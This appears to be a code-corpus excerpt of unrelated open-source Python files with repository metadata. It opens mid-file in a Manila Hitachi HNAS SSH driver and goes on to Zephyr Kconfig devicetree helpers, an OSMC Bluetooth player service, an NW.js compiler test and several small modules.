@mutils.retry(exception=exception.HNASConnException, wait_random=True)
def _execute(self, commands):
command = ['ssc', '127.0.0.1']
if self.admin_ip0 is not None:
command = ['ssc', '--smuauth', self.admin_ip0]
command += ['console-context', '--evs', self.evs_id]
commands = command + commands
mutils.check_ssh_injection(commands)
commands = ' '.join(commands)
if not self.sshpool:
self.sshpool = mutils.SSHPool(ip=self.ip,
port=self.port,
conn_timeout=None,
login=self.user,
password=self.password,
privatekey=self.priv_key)
with self.sshpool.item() as ssh:
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
out, err = processutils.ssh_execute(ssh, commands,
check_exit_code=True)
LOG.debug("Command %(cmd)s result: out = %(out)s - err = "
"%(err)s.", {
'cmd': commands,
'out': out,
'err': err,
})
return out, err
except processutils.ProcessExecutionError as e:
if 'Failed to establish SSC connection' in e.stderr:
msg = _("Failed to establish SSC connection.")
LOG.debug(msg)
raise exception.HNASConnException(msg=msg)
else:
LOG.debug("Error running SSH command. "
"Command %(cmd)s result: out = %(out)s - err = "
"%(err)s - exit = %(exit)s.", {
'cmd': e.cmd,
'out': e.stdout,
'err': e.stderr,
'exit': e.exit_code,
})
raise
@mutils.synchronized("hitachi_hnas_select_fs", external=True)
def _locked_selectfs(self, op, path):
if op == 'create':
command = ['selectfs', self.fs_name, '\n',
'ssc', '127.0.0.1', 'console-context', '--evs',
self.evs_id, 'mkdir', '-p', path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if "Current file system invalid: VolumeNotFound" in e.stderr:
msg = _("Command to create directory %s failed due to "
"context change.") % path
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
else:
msg = _("Failed to create directory %s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
if op == 'delete':
command = ['selectfs', self.fs_name, '\n',
'ssc', '127.0.0.1', 'console-context', '--evs',
self.evs_id, 'rmdir', path]
try:
self._execute(command)
except processutils.ProcessExecutionError as e:
if 'DirectoryNotEmpty' in e.stderr:
msg = _("Share %s has more snapshots.") % path
LOG.debug(msg)
raise exception.HNASDirectoryNotEmpty(msg=msg)
elif 'cannot remove' in e.stderr and 'NotFound' in e.stderr:
LOG.warning("Attempted to delete path %s but it does "
"not exist.", path)
elif 'Current file system invalid: VolumeNotFound' in e.stderr:
msg = _("Command to delete empty directory %s failed due "
"to context change.") % path
LOG.debug(msg)
raise exception.HNASSSCContextChange(msg=msg)
else:
msg = _("Failed to delete directory %s.") % path
LOG.exception(msg)
raise exception.HNASBackendException(msg=msg)
class Export(object):
def __init__(self, data):
if data:
split_data = data.split('Export configuration:\n')
items = split_data[0].split('\n')
self.export_name = items[0].split(':')[1].strip()
self.export_path = items[1].split(':')[1].strip()
if '*** not available ***' in items[2]:
self.file_system_info = items[2].split(':')[1].strip()
index = 0
else:
self.file_system_label = items[2].split(':')[1].strip()
self.file_system_size = items[3].split(':')[1].strip()
self.file_system_free_space = items[4].split(':')[1].strip()
self.file_system_state = items[5].split(':')[1]
self.formatted = items[6].split('=')[1].strip()
self.mounted = items[7].split('=')[1].strip()
self.failed = items[8].split('=')[1].strip()
self.thin_provisioned = items[9].split('=')[1].strip()
index = 7
self.access_snapshots = items[3 + index].split(':')[1].strip()
self.display_snapshots = items[4 + index].split(':')[1].strip()
self.read_caching = items[5 + index].split(':')[1].strip()
self.disaster_recovery_setting = items[6 + index].split(':')[1]
self.recovered = items[7 + index].split('=')[1].strip()
self.transfer_setting = items[8 + index].split('=')[1].strip()
self.export_configuration = []
export_config = split_data[1].split('\n')
for i in range(0, len(export_config)):
if any(j.isdigit() or j.isalpha() for j in export_config[i]):
self.export_configuration.append(export_config[i])
class JobStatus(object):
def __init__(self, data):
if data:
lines = data.split("\n")
self.job_id = lines[0].split()[3]
self.physical_node = lines[2].split()[3]
self.evs = lines[3].split()[2]
self.volume_number = lines[4].split()[3]
self.fs_id = lines[5].split()[4]
self.fs_name = lines[6].split()[4]
self.source_path = lines[7].split()[3]
self.creation_time = " ".join(lines[8].split()[3:5])
self.destination_path = lines[9].split()[3]
self.ensure_path_exists = lines[10].split()[5]
self.job_state = " ".join(lines[12].split()[3:])
self.job_started = " ".join(lines[14].split()[2:4])
self.job_ended = " ".join(lines[15].split()[2:4])
self.job_status = lines[16].split()[2]
error_details_line = lines[17].split()
if len(error_details_line) > 3:
self.error_details = " ".join(error_details_line[3:])
else:
self.error_details = None
self.directories_processed = lines[18].split()[3]
self.files_processed = lines[19].split()[3]
self.data_bytes_processed = lines[20].split()[4]
self.directories_missing = lines[21].split()[4]
self.files_missing = lines[22].split()[4]
self.files_skipped = lines[23].split()[4]
skipping_details_line = lines[24].split()
if len(skipping_details_line) > 3:
self.skipping_details = " ".join(skipping_details_line[3:])
else:
self.skipping_details = None
class JobSubmit(object):
def __init__(self, data):
if data:
split_data = data.replace(".", "").split()
self.request_status = " ".join(split_data[1:4])
self.job_id = split_data[8]
class Filesystem(object):
def __init__(self, data):
if data:
items = data.split()
self.id = items[0]
self.label = items[1]
self.evs = items[2]
self.size = float(items[3])
self.size_measure = items[4]
if self.size_measure == 'TB':
self.size = self.size * units.Ki
if items[5:7] == ["Not", "mounted"]:
self.mounted = False
else:
self.mounted = True
self.used = float(items[5])
self.used_measure = items[6]
if self.used_measure == 'TB':
self.used = self.used * units.Ki
self.dedupe = 'dedupe enabled' in data
class Quota(object):
def __init__(self, data):
if data:
if 'No quotas matching' in data:
self.type = None
self.target = None
self.usage = None
self.usage_unit = None
self.limit = None
self.limit_unit = None
else:
items = data.split()
self.type = items[2]
self.target = items[6]
self.usage = items[9]
self.usage_unit = items[10]
if items[13] == 'Unset':
self.limit = None
else:
self.limit = float(items[13])
self.limit_unit = items[14]
class CIFSPermissions(object):
def __init__(self, data):
self.permission_list = []
hnas_cifs_permissions = [('Allow Read', 'ar'),
('Allow Change & Read', 'acr'),
('Allow Full Control', 'af'),
('Deny Read', 'dr'),
('Deny Change & Read', 'dcr'),
('Deny Full Control', 'df')]
lines = data.split('\n')
for line in lines:
filtered = list(filter(lambda x: x[0] in line,
hnas_cifs_permissions))
if len(filtered) == 1:
token, permission = filtered[0]
user = line.split(token)[1:][0].strip()
self.permission_list.append((user, permission))
class CIFSShare(object):
def __init__(self, data):
lines = data.split('\n')
for line in lines:
if 'File system label' in line:
self.fs = line.split(': ')[1]
elif 'Share users' in line:
users = line.split(': ')
self.is_mounted = users[1] != '0'
|
bswartz/manila
|
manila/share/drivers/hitachi/hnas/ssh.py
|
Python
|
apache-2.0
| 35,481
|
import torch
import numpy as np
from utils import alphaPlot
def validate(model, val_iter, writer):
model.eval()
total_loss = 0
if len(val_iter) == 1:
random_batch = 0
else:
random_batch = np.random.randint(0, len(val_iter) - 1)
for i, batch in enumerate(val_iter):
outputs, alpha = model(batch.src, maxLen=len(batch.tgt[1:]))
(seq_len, batch_size, vocab_size) = outputs.size()
# tensorboard logging
preds = outputs.topk(1)[1]
source = model.src2txt(batch.src[:, 0].data)
target = model.tgt2txt(batch.tgt[1:, 0].data)
output = model.tgt2txt(preds[:, 0].data)
alpha_plot = alphaPlot(alpha[0], output, source)
writer.add_image('Attention', alpha_plot, dataformats='HWC')
writer.add_text('Source: ', source)
writer.add_text('Output: ', output)
writer.add_text('Target: ', target)
|
anoopsarkar/nlp-class-hw
|
neuralmt/validator.py
|
Python
|
apache-2.0
| 912
|
def parser(args, actions):
for action in actions:
if args.get(action):
return actions[action](**args)
raise NotImplemented
class NotImplemented:
pass
|
demophoon/sams-client
|
client/cli.py
|
Python
|
mit
| 184
|
import time
import os
import shutil
import subprocess
import platform
from subprocess import Popen, PIPE
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
testdir = os.path.dirname(os.path.abspath(__file__))
chrome_options.add_argument("nwapp=" + testdir)
binfile = os.path.join(testdir, "mytest.bin")
nwjc = os.path.join(os.path.dirname(os.environ['CHROMEDRIVER']), "nwjc.exe" if os.name == "nt" else "nwjc")
os.chdir(testdir)
try:
os.remove(binfile)
except:
pass
assert(False == os.path.isfile(binfile))
subprocess.call([nwjc, "mytest.js", "mytest.bin"])
assert(os.path.isfile(binfile))
if platform.system() == 'Linux':
proc = Popen(['strings', 'mytest.bin'], stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()
print out
assert("42" not in out)
assert("foo" not in out)
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(5)
try:
print driver.current_url
result = driver.find_element_by_id('result')
print result.get_attribute('innerHTML')
assert("44" == result.get_attribute('innerHTML'))
result2 = driver.find_element_by_id('result2').get_attribute('innerHTML')
print result2
assert("function mytest() { [native code] }" == result2)
result3 = driver.find_element_by_id('result3').get_attribute('innerHTML')
result4 = driver.find_element_by_id('result4').get_attribute('innerHTML')
assert("44" == result3)
assert("function testinner() { [native code] }" == result4)
finally:
driver.quit()
|
nwjs/nw.js
|
test/sanity/nwjc/test.py
|
Python
|
mit
| 1,606
|
# Copyright (c) 2018-2019 Linaro
# Copyright (c) 2019 Nordic Semiconductor ASA
#
# SPDX-License-Identifier: Apache-2.0
import os
import pickle
import sys
ZEPHYR_BASE = os.environ["ZEPHYR_BASE"]
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib
# Types we support
# 'string', 'int', 'hex', 'bool'
doc_mode = os.environ.get('KCONFIG_DOC_MODE') == "1"
if not doc_mode:
EDT_PICKLE = os.environ.get("EDT_PICKLE")
# The "if" handles a missing dts.
if EDT_PICKLE is not None and os.path.isfile(EDT_PICKLE):
with open(EDT_PICKLE, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
def _warn(kconf, msg):
print("{}:{}: WARNING: {}".format(kconf.filename, kconf.linenr, msg))
def _dt_units_to_scale(unit):
if not unit:
return 0
if unit in {'k', 'K'}:
return 10
if unit in {'m', 'M'}:
return 20
if unit in {'g', 'G'}:
return 30
def dt_chosen_label(kconf, _, chosen):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that node
has a "label" property and return the value of that "label", if not we
return an empty string.
"""
if doc_mode or edt is None:
return ""
node = edt.chosen_node(chosen)
if not node:
return ""
if "label" not in node.props:
return ""
return node.props["label"].val
def dt_chosen_enabled(kconf, _, chosen):
"""
This function returns "y" if /chosen contains a property named 'chosen'
that points to an enabled node, and "n" otherwise
"""
if doc_mode or edt is None:
return "n"
node = edt.chosen_node(chosen)
return "y" if node and node.status == "okay" else "n"
def dt_chosen_path(kconf, _, chosen):
"""
This function takes a /chosen node property and returns the path
to the node in the property value, or the empty string.
"""
if doc_mode or edt is None:
return "n"
node = edt.chosen_node(chosen)
return node.path if node else ""
def dt_node_enabled(kconf, name, node):
"""
This function is used to test if a node is enabled (has status
'okay') or not.
The 'node' argument is a string which is either a path or an
alias, or both, depending on 'name'.
If 'name' is 'dt_path_enabled', 'node' is an alias or a path. If
'name' is 'dt_alias_enabled, 'node' is an alias.
"""
if doc_mode or edt is None:
return "n"
if name == "dt_alias_enabled":
if node.startswith("/"):
# EDT.get_node() works with either aliases or paths. If we
# are specifically being asked about an alias, reject paths.
return "n"
else:
# Make sure this is being called appropriately.
assert name == "dt_path_enabled"
try:
node = edt.get_node(node)
except edtlib.EDTError:
return "n"
return "y" if node and node.status == "okay" else "n"
def dt_nodelabel_enabled(kconf, _, label):
"""
This function is like dt_node_enabled(), but the 'label' argument
should be a node label, like "foo" is here:
foo: some-node { ... };
"""
if doc_mode or edt is None:
return "n"
node = edt.label2node.get(label)
return "y" if node and node.status == "okay" else "n"
def _node_reg_addr(node, index, unit):
if not node:
return 0
if not node.regs:
return 0
if int(index) >= len(node.regs):
return 0
if node.regs[int(index)].addr is None:
return 0
return node.regs[int(index)].addr >> _dt_units_to_scale(unit)
def _node_reg_size(node, index, unit):
if not node:
return 0
if not node.regs:
return 0
if int(index) >= len(node.regs):
return 0
if node.regs[int(index)].size is None:
return 0
return node.regs[int(index)].size >> _dt_units_to_scale(unit)
def _node_int_prop(node, prop, unit=None):
"""
This function takes a 'node' and will look to see if that 'node' has a
property called 'prop' and if that 'prop' is an integer type will return
the value of the property 'prop' as either a string int or string hex
value, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if not node:
return 0
if prop not in node.props:
return 0
if node.props[prop].type != "int":
return 0
return node.props[prop].val >> _dt_units_to_scale(unit)
def _dt_chosen_reg_addr(kconf, chosen, index=0, unit=None):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that
nodnode has a register at the given 'index' and return the address value of
that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
node = edt.chosen_node(chosen)
return _node_reg_addr(node, index, unit)
def _dt_chosen_reg_size(kconf, chosen, index=0, unit=None):
"""
This function takes a 'chosen' property and treats that property as a path
to an EDT node. If it finds an EDT node, it will look to see if that node
has a register at the given 'index' and return the size value of that reg,
if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
node = edt.chosen_node(chosen)
return _node_reg_size(node, index, unit)
def dt_chosen_reg(kconf, name, chosen, index=0, unit=None):
"""
This function just routes to the proper function and converts
the result to either a string int or string hex value.
"""
if name == "dt_chosen_reg_size_int":
return str(_dt_chosen_reg_size(kconf, chosen, index, unit))
if name == "dt_chosen_reg_size_hex":
return hex(_dt_chosen_reg_size(kconf, chosen, index, unit))
if name == "dt_chosen_reg_addr_int":
return str(_dt_chosen_reg_addr(kconf, chosen, index, unit))
if name == "dt_chosen_reg_addr_hex":
return hex(_dt_chosen_reg_addr(kconf, chosen, index, unit))
def _dt_node_reg_addr(kconf, path, index=0, unit=None):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a register at the
given 'index' and return the address value of that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
try:
node = edt.get_node(path)
except edtlib.EDTError:
return 0
return _node_reg_addr(node, index, unit)
def _dt_node_reg_size(kconf, path, index=0, unit=None):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a register at the
given 'index' and return the size value of that reg, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return 0
try:
node = edt.get_node(path)
except edtlib.EDTError:
return 0
return _node_reg_size(node, index, unit)
def dt_node_reg(kconf, name, path, index=0, unit=None):
"""
This function just routes to the proper function and converts
the result to either a string int or string hex value.
"""
if name == "dt_node_reg_size_int":
return str(_dt_node_reg_size(kconf, path, index, unit))
if name == "dt_node_reg_size_hex":
return hex(_dt_node_reg_size(kconf, path, index, unit))
if name == "dt_node_reg_addr_int":
return str(_dt_node_reg_addr(kconf, path, index, unit))
if name == "dt_node_reg_addr_hex":
return hex(_dt_node_reg_addr(kconf, path, index, unit))
def dt_node_has_bool_prop(kconf, _, path, prop):
"""
This function takes a 'path' and looks for an EDT node at that path. If it
finds an EDT node, it will look to see if that node has a boolean property
by the name of 'prop'. If the 'prop' exists it will return "y" otherwise
we return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "n"
if prop not in node.props:
return "n"
if node.props[prop].type != "boolean":
return "n"
if node.props[prop].val:
return "y"
return "n"
def dt_node_has_prop(kconf, _, label, prop):
"""
This function takes a 'label' and looks for an EDT node for that label. If
it finds an EDT node, it will look to see if that node has a property
by the name of 'prop'. If the 'prop' exists it will return "y" otherwise
we return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.label2node.get(label)
except edtlib.EDTError:
return "n"
if node is None:
return "n"
if prop in node.props:
return "y"
return "n"
def dt_node_int_prop(kconf, name, path, prop, unit=None):
"""
This function takes a 'path' and property name ('prop') looks for an EDT
node at that path. If it finds an EDT node, it will look to see if that
node has a property called 'prop' and if that 'prop' is an integer type
will return the value of the property 'prop' as either a string int or
string hex value, if not we return 0.
The function will divide the value based on 'unit':
None No division
'k' or 'K' divide by 1024 (1 << 10)
'm' or 'M' divide by 1,048,576 (1 << 20)
'g' or 'G' divide by 1,073,741,824 (1 << 30)
"""
if doc_mode or edt is None:
return "0"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "0"
if name == "dt_node_int_prop_int":
return str(_node_int_prop(node, prop, unit))
if name == "dt_node_int_prop_hex":
return hex(_node_int_prop(node, prop, unit))
def dt_node_str_prop_equals(kconf, _, path, prop, val):
"""
This function takes a 'path' and property name ('prop') looks for an EDT
node at that path. If it finds an EDT node, it will look to see if that
node has a property 'prop' of type string. If that 'prop' is equal to 'val'
it will return "y" otherwise return "n".
"""
if doc_mode or edt is None:
return "n"
try:
node = edt.get_node(path)
except edtlib.EDTError:
return "n"
if prop not in node.props:
return "n"
if node.props[prop].type != "string":
return "n"
if node.props[prop].val == val:
return "y"
return "n"
def dt_compat_enabled(kconf, _, compat):
"""
This function takes a 'compat' and returns "y" if we find a status "okay"
compatible node in the EDT otherwise we return "n"
"""
if doc_mode or edt is None:
return "n"
return "y" if compat in edt.compat2okay else "n"
def dt_compat_on_bus(kconf, _, compat, bus):
"""
This function takes a 'compat' and returns "y" if we find an "enabled"
compatible node in the EDT which is on bus 'bus'. It returns "n" otherwise.
"""
if doc_mode or edt is None:
return "n"
if compat in edt.compat2okay:
for node in edt.compat2okay[compat]:
if node.on_bus is not None and node.on_bus == bus:
return "y"
return "n"
def dt_nodelabel_has_compat(kconf, _, label, compat):
"""
This function takes a 'label' and returns "y" if an "enabled" node with
such label can be found in the EDT and that node is compatible with the
provided 'compat', otherwise it returns "n".
"""
if doc_mode or edt is None:
return "n"
if compat in edt.compat2okay:
for node in edt.compat2okay[compat]:
if label in node.labels:
return "y"
return "n"
def dt_nodelabel_path(kconf, _, label):
"""
This function takes a node label (not a label property) and
returns the path to the node which has that label, or an empty
string if there is no such node.
"""
if doc_mode or edt is None:
return ""
node = edt.label2node.get(label)
return node.path if node else ""
def shields_list_contains(kconf, _, shield):
"""
Return "n" if cmake environment variable 'SHIELD_AS_LIST' doesn't exist.
Return "y" if 'shield' is present list obtained after 'SHIELD_AS_LIST'
has been split using ";" as a separator and "n" otherwise.
"""
try:
list = os.environ['SHIELD_AS_LIST']
except KeyError:
return "n"
return "y" if shield in list.split(";") else "n"
# Keys in this dict are the function names as they appear
# in Kconfig files. The values are tuples in this form:
#
# (python_function, minimum_number_of_args, maximum_number_of_args)
#
# Each python function is given a kconf object and its name in the
# Kconfig file, followed by arguments from the Kconfig file.
#
# See the kconfiglib documentation for more details.
functions = {
"dt_compat_enabled": (dt_compat_enabled, 1, 1),
"dt_compat_on_bus": (dt_compat_on_bus, 2, 2),
"dt_chosen_label": (dt_chosen_label, 1, 1),
"dt_chosen_enabled": (dt_chosen_enabled, 1, 1),
"dt_chosen_path": (dt_chosen_path, 1, 1),
"dt_path_enabled": (dt_node_enabled, 1, 1),
"dt_alias_enabled": (dt_node_enabled, 1, 1),
"dt_nodelabel_enabled": (dt_nodelabel_enabled, 1, 1),
"dt_chosen_reg_addr_int": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_addr_hex": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_size_int": (dt_chosen_reg, 1, 3),
"dt_chosen_reg_size_hex": (dt_chosen_reg, 1, 3),
"dt_node_reg_addr_int": (dt_node_reg, 1, 3),
"dt_node_reg_addr_hex": (dt_node_reg, 1, 3),
"dt_node_reg_size_int": (dt_node_reg, 1, 3),
"dt_node_reg_size_hex": (dt_node_reg, 1, 3),
"dt_node_has_bool_prop": (dt_node_has_bool_prop, 2, 2),
"dt_node_has_prop": (dt_node_has_prop, 2, 2),
"dt_node_int_prop_int": (dt_node_int_prop, 2, 3),
"dt_node_int_prop_hex": (dt_node_int_prop, 2, 3),
"dt_node_str_prop_equals": (dt_node_str_prop_equals, 3, 3),
"dt_nodelabel_has_compat": (dt_nodelabel_has_compat, 2, 2),
"dt_nodelabel_path": (dt_nodelabel_path, 1, 1),
"shields_list_contains": (shields_list_contains, 1, 1),
}
|
zephyrproject-rtos/zephyr
|
scripts/kconfig/kconfigfunctions.py
|
Python
|
apache-2.0
| 15,611
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron. Copyright Yannick Buron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import res_config
|
codoo/vertical-exchange
|
base_exchange/__init__.py
|
Python
|
agpl-3.0
| 949
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
This Program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This Program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with XBMC; see the file COPYING. If not, write to
the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
http://www.gnu.org/copyleft/gpl.html
'''
import time
import xbmc
import xbmcaddon
import signal
import dbus
import dbus.service
import dbus.mainloop.glib
import gobject
import threading
import json
SERVICE_NAME = "org.bluez"
AGENT_IFACE = SERVICE_NAME + '.Agent1'
ADAPTER_IFACE = SERVICE_NAME + ".Adapter1"
DEVICE_IFACE = SERVICE_NAME + ".Device1"
PLAYER_IFACE = SERVICE_NAME + '.MediaPlayer1'
TRANSPORT_IFACE = SERVICE_NAME + '.MediaTransport1'
__addon__ = xbmcaddon.Addon()
__addonversion__ = __addon__.getAddonInfo('version')
__addonid__ = __addon__.getAddonInfo('id')
__addonname__ = __addon__.getAddonInfo('name')
def log(txt):
message = '%s: %s' % (__addonname__, str(txt).encode('ascii', 'ignore'))
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
class BTPlayer(threading.Thread):
bus = None
mainloop = None
device = None
deviceAlias = None
player = None
transport = None
connected = None
state = None
status = None
def __init__(self):
"""Specify a signal handler, and find any connected media players"""
super(BTPlayer, self).__init__()
self.bus = dbus.SystemBus()
self.bus.add_signal_receiver(self.playerHandler,
bus_name="org.bluez",
dbus_interface="org.freedesktop.DBus.Properties",
signal_name="PropertiesChanged",
path_keyword="path")
self.findPlayer()
def run(self):
"""Start monitoring bluez by running the gobject Mainloop()"""
gobject.threads_init()
self.mainloop = gobject.MainLoop()
self.mainloop.run()
def end(self):
"""Stop the gobject Mainloop()"""
if (self.mainloop):
self.mainloop.quit();
def findPlayer(self):
"""Find any current media players and associated device"""
manager = dbus.Interface(self.bus.get_object("org.bluez", "/"), "org.freedesktop.DBus.ObjectManager")
objects = manager.GetManagedObjects()
player_path = None
transport_path = None
for path, interfaces in objects.iteritems():
if PLAYER_IFACE in interfaces:
player_path = path
break
if TRANSPORT_IFACE in interfaces:
transport_path = path
if player_path:
self.connected = True
self.getPlayer(player_path)
player_properties = self.player.GetAll(PLAYER_IFACE, dbus_interface="org.freedesktop.DBus.Properties")
if "Status" in player_properties:
self.status = player_properties["Status"]
if "Track" in player_properties:
self.track = player_properties["Track"]
else:
log("Could not find a player")
if transport_path:
self.transport = self.bus.get_object("org.bluez", transport_path)
transport_properties = self.transport.GetAll(TRANSPORT_IFACE, dbus_interface="org.freedesktop.DBus.Properties")
if "State" in transport_properties:
self.state = transport_properties["State"]
def getPlayer(self, path):
"""Get a media player from a dbus path, and the associated device"""
self.player = self.bus.get_object("org.bluez", path)
device_path = self.player.Get("org.bluez.MediaPlayer1", "Device", dbus_interface="org.freedesktop.DBus.Properties")
self.getDevice(device_path)
def getDevice(self, path):
"""Get a device from a dbus path"""
self.device = self.bus.get_object("org.bluez", path)
self.deviceAlias = self.device.Get(DEVICE_IFACE, "Alias", dbus_interface="org.freedesktop.DBus.Properties")
def playerHandler(self, interface, changed, invalidated, path):
"""Handle relevant property change signals"""
iface = interface[interface.rfind(".") + 1:]
player_path = path
if __addon__.getSetting("debug") == "true":
log("Changed : " + str(changed))
log("Interface : " + str(interface))
log("Path : " + str(path))
log("Player Path : " + str(player_path))
if iface == "Device1":
if "Connected" in changed:
self.connected = changed["Connected"]
elif iface == "MediaControl1":
if "Connected" in changed:
self.connected = changed["Connected"]
if changed["Connected"]:
self.findPlayer()
elif iface == "MediaTransport1":
if "State" in changed:
if not changed["State"] == self.state:
self.state = changed["State"]
if not self.state == "active":
xbmc.stopBTPlayer()
elif iface == "MediaPlayer1":
if "Status" in changed:
if not changed["Status"] == self.status:
if changed["Status"] == "playing" and self.state == "active":
xbmc.startBTPlayer(player_path);
def isPlaying(self):
return self.state == "active"
def next(self):
self.player.Next(dbus_interface=PLAYER_IFACE)
def previous(self):
self.player.Previous(dbus_interface=PLAYER_IFACE)
def play(self):
self.player.Play(dbus_interface=PLAYER_IFACE)
def stop(self):
self.player.Stop(dbus_interface=PLAYER_IFACE)
self.receivedPosition = None;
def pause(self):
self.player.Pause(dbus_interface=PLAYER_IFACE)
def volumeUp(self):
self.control.VolumeUp(dbus_interface=CONTROL_IFACE)
self.transport.VolumeUp(dbus_interface=TRANSPORT_IFACE)
def volumeDown(self):
self.control.VolumeDown(dbus_interface=CONTROL_IFACE)
self.transport.VolumeDown(dbus_interface=TRANSPORT_IFACE)
def startBTPlayer(self, macAddress):
if "playing" in self.status:
if xbmc.isBTPlayerActive() == 0:
log("Start BTPlayer")
xbmc.startBTPlayer(macAddress)
class BTPlayerMonitor(xbmc.Player):
btPlayer = None
def __init__( self, *args, **kwargs ):
log("BTPlayerMonitor Started")
def setBtPlayer(self, btPlayer):
self.btPlayer = btPlayer
def onPlayBackStopped(self):
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
self.btPlayer.stop()
def onPlayBackPaused(self):
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
self.btPlayer.pause()
def onPlayBackResumed(self):
if xbmc.isBTPlayerActive() and self.btPlayer.player:
self.btPlayer.play()
def onNextItem(self):
if __addon__.getSetting("debug") == "true":
log("Next Item Event Fired")
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
try:
self.btPlayer.next()
except Exception as e:
log("Exception caught trying to request next track: " + str(e))
def onPreviousItem(self):
if __addon__.getSetting("debug") == "true":
log("Previous Item Event Fired")
if xbmc.isBTPlayerActive() and self.btPlayer.isPlaying() and self.btPlayer.player:
try:
self.btPlayer.previous()
except Exception as e:
log("Exception caught trying to request previous track: " + str(e))
if __name__ == "__main__":
if __addon__.getSetting("enabled") == "true":
log("BTPlayer Starting")
try:
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
btPlayer = BTPlayer()
btPlayer.start()
btPlayerMonitor = BTPlayerMonitor()
btPlayerMonitor.setBtPlayer(btPlayer)
monitor = xbmc.Monitor()
while not monitor.abortRequested():
# Sleep/wait for abort for 10 seconds
if monitor.waitForAbort(3):
# Abort was requested while waiting. We should exit
break
except Exception as e:
log("Exception caught - service exiting " + str(e))
finally:
btPlayer.end()
log("BTPlayer ended")
else:
log("BTPlayer disabled in addon settings")
|
diraimondo/osmc
|
package/a2dp-app-osmc/files/usr/share/kodi/addons/service.osmc.btplayer/service.py
|
Python
|
gpl-2.0
| 9,195
|
# -*- coding: utf-8 -*-
#
# This file is part of Zenodo.
# Copyright (C) 2016 CERN.
#
# Zenodo is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Zenodo is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Zenodo; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Sanitized Unicode string field."""
from __future__ import absolute_import, print_function
from marshmallow import fields
from .sanitizedunicode import SanitizedUnicode
class SanitizedUrl(SanitizedUnicode, fields.Url):
"""SanitizedString-based URL field."""
def _deserialize(self, value, attr, data):
"""Deserialize sanitized URL value."""
# Apply SanitizedUnicode first
value = SanitizedUnicode._deserialize(self, value, attr, data)
return fields.Url._deserialize(self, value, attr, data)
|
lnielsen/zenodo
|
zenodo/modules/records/serializers/fields/sanitizedurl.py
|
Python
|
gpl-2.0
| 1,506
|
#!/usr/bin/env python
import pytest
